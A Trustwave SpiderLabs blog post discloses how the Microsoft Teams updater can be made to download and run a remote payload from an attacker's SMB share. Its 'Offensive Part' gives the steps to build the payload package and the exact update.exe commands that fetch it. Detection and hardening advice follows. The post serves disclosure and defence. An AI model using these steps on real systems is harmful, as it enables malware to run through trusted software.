Join Trustwave at the 2023 Gartner Security & Risk Management Summit in London, September 26-28. Learn More

Join Trustwave at the 2023 Gartner Security & Risk Management Summit in London, September 26-28. Learn More

Managed Detection & Response

Eradicate cyberthreats with world-class intel and expertise

Managed Security Services

Expand your team’s capabilities and strengthen your security posture

Consulting & Professional Services

Tap into our global team of tenured cybersecurity specialists

Penetration Testing

Subscription- or project-based testing, delivered by global experts

Database Security

Get ahead of database risk, protect data and exceed compliance requirements

Email Security & Management

Catch email threats others miss with layered security & maximum control

Co-Managed SOC (SIEM)

Eliminate alert fatigue, focus your SecOps team, stop threats fast, and reduce cyber risk

Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
The Trustwave Approach
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Platform
SpiderLabs Fusion Center
Security Operations Centers
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats

Microsoft Teams Updater Living off the Land


During this global pandemic COVID-19 situation, there has been an increasing trend of video conferencing solutions, Trustwave SpiderLabs are exercising extra vigilance in monitoring the video conferencing traffics. During our threat hunt, we have observed lots of Microsoft Teams updater traffic. Due to the noisy nature of the traffic, there is a possibility that malicious traffic hiding there will evade the analyst's view or even be added to a list of allowed, and therefore unmonitored, list of applications.

Because of this, I reviewed the previous findings on Microsoft Team code execution and found that it was fixed but not completely.


My original finding allowed a malicious actor to use the MS Teams Updater to download any binary or payload they wish. This technique is typically known as Living Off the Land and is especially dangerous, as it uses known, common software to download malware.

The patch previously provided for Teams was to restrict its ability to update via a URL. Instead, the updater allows local connections via a share or local folder for product updates.

Initially, when I observed this finding, I figured it could still be used as a technique for lateral movement, however, I found the limitations added could be easily bypassed by pointing to a remote SMB share.

Legitimate Events:

%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacated>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacated>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacated>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update

Current Patch

As per the patch, Microsoft Teams Updater will allow only local network paths to access and update, that means it will detect the string "http/s", ":", "/" and port numbers in the updater URL, blocks and log the activity under %localappdata%\Microsoft\Teams\SquirrelSetup.log




It allows share access in the local UNC format: \\server\

To exploit this an attacker would need to:

  1. Get the file inside the network in an open shared folders
  2. Access the payload from that share to the victim machine

It looks like a complicated scenario and there’s a long road to travel, but we can make it work.

Remote Samba

To reduce the attack steps, an attacker can create a remote rather than local share. This would allow them to download the remote payload and execute rather than trying to get the payload to a local share as an intermediary step.

I did some research on Samba and configured a Samba server for remote, public access. After a successful setup, I initiated the command execution, downloaded remote payload, and executed directly from Microsoft Teams Updater "Update.exe"

Command: Update.exe --update=\\remoteserver\payloadFolder

Vulnerable Endpoint


Offensive Part

To exploit this, a payload that supports the updater framework must be crafted first

Payload creation:

  1. Extract any nupkg package, in my example, Teams-
    1. goto %localappdata%/Microsoft/Teams/packages to pick Microsoft Teams pre-built package
  2. Go to Teams-\lib\net45 and drop your shellcode as 'squirrel.exe' compress the complete folder as 'Teams-'
  3. Calculate the metadata with the command:
    sha1sum Teams- && wc -c < Teams-

    resulting with the output:
    fa8b87f0b995498a6e890c832dcaf968997608d4 Teams- 4695

  4. Create a file named RELEASES and copy the above output and save.
  5. The result will be a main directory containing two files: Teams- and RELEASES.
  6. upload those two files to remote Samba server:




Since it is a Samba server, the server needs to be first authenticated from windows "Run".

Steps to Reproduce:

  1. Go to target application folder "%localappdata%/Microsoft/Teams/" on the victim system
  2. Run the below command:
    update.exe --update=[Samba server contains the above 2 files]
    e.g. update.exe --update=\\remoteserver\payloadFolder

After some seconds (wait for 10-15 seconds), the payload will be downloaded successfully and executed by Microsoft Teams

Affected parameters:

update.exe --update=\\remoteserver\payloadFolder
update.exe --updateRollback=\\remoteserver\payloadFolder

Exploitation Flow:


Proof of concept:


  • Microsoft Teams Update.exe binary would act as LOLbin (Living off the Land binaries)
  • Since the installation is in the local user Appdata folder, no privileged access is needed
  • Attackers can use this to masquerade the traffic (especially for lateral movement)

Trustwave did reach out to Microsoft on this issue and they responded saying:

“Thank you again for submitting this issue to Microsoft. We determined that this behavior is considered to be by design as "we cannot restrict SMB source for –update because we have customers that apparently rely on this (e.g. folder redirection)."

Trustwave Recommendations

From the Threat hunting perspective

  1. Utilize the EDR solutions and look at "update.exe" command lines for suspicious connections
  2. Hunt for squirrel.exe executables and investigate the size of the file, you can use that to differentiate trojan squirrels from the legit squirrel.exe
    • If you are dealing with Microsoft Teams “update.exe”, Validate the size and hash, hunt for any anomalies
  3. Investigate outgoing SMB connections especially from the Microsoft Teams updater update.exe or filter SMB connections entirely at the perimeter if unnecessary
  4. Request customer or IT for any security exclusions placed for Microsoft Teams packages and review the change applied
  5. IT should install the Microsoft Teams under the "Program Files" folder, so an attacker cannot drop and execute the remote payload; this can be carried out by Group policy
  6. Disable any kind of update mechanisms and set a policy that updates should be pushed only by the IT team

Trustwave is exercising extra vigilance in monitoring this kind of traffic. We regularly monitor and improve our threat hunting plans for all global cyber events and all organizations can undertake similar operations within their environment. Contact Trustwave about engaging professional threat hunting.